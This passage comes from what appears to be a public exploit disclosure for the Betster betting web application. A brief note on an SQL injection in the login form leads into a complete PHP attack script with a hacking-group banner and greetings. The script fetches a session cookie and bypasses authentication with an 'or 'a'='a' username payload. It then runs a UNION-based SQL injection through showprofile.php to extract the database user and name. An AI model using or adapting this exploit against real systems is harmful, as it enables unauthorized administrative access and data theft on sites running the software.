getState()) && (($user->getStatus() == "administrator") || ($user->getStatus() == "betmaster"))){ $mainhtml = file_get_contents("tpl/showprofile.inc"); $id = htmlspecialchars($_GET['id']); <<<< WTF !! $xuser = $db_mapper->getUserById($id); ----------------------------------------------------------------------------- /categoryedit.php (LINE: 52) ----------------------------------------------------------------------------- $id = htmlspecialchars($_GET['id']); <<<< WTF !! $action = htmlspecialchars($_GET['ac']); ----------------------------------------------------------------------------- ########################################### VULNERABILITY: Authentication Bypass (SQLi) ########################################### File index.php (Login function) has SQL Injection vulnerability, "username" parameter supplied in POST parameter for checking valid credentials. The "username" parameter is not validated before passing into SQL query which arise authentication bypass issue. ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 50); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------------+"; print "\n| Betster Auth Bypass & SQL Injection Exploit |"; print "\n+---------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] \n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /betster/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN"; $packet = "GET {$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; print "\n ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n"; $response = http_send($host, $packet); if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); $packet = "POST {$path}index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$sid[1]}\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; print "\n\n[+] Bypassing Authentication...\n"; sleep(2); $response=http_send($host, $packet); preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] Bypass Authentication Failed !!\n"); $packet = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0\r\n"; $packet .= "Cookie: {$sid[1]}\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; print "[+] Performing SQL Injection Attack\n"; sleep(2); $response1=http_send($host, $packet); preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n"); ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ ?>